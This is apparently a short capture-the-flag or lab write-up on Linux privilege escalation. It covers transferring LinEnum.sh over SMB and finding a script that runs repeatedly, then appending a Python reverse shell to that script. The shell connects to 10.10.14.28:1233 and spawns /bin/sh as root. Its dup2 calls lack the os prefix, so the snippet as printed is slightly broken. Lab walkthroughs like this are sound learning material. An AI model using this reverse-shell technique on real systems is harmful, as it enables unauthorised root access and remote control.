Post Exploitation

Privelege Escalation

Transfer LinEnum.sh over through SMB, wget will not work :(

Appears that this script is being executed repeatedly

The file only has read permissions, after reading the file, we see that it runs the os module. We can check if that is configured correctly.

Added the following code to the end of the file

import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.10.14.28",1233));
dup2(s.fileno(),0); 
dup2(s.fileno(),1); 
dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);

We are root!